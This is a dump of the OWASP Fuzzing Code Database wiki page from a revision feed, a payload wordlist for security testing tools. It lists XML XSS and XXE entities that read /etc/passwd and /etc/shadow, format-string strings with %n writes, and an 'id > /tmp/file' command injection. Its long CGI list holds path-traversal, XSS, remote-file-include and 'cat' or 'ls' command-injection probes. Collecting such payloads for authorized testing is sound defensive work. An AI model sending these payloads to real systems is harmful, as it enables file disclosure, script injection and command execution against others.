&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80073</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80073"/>
				<updated>2010-03-17T21:05:49Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Windows Directory Traversal   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (7 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (7 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin&lt;br /&gt;
# on unix, usually /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
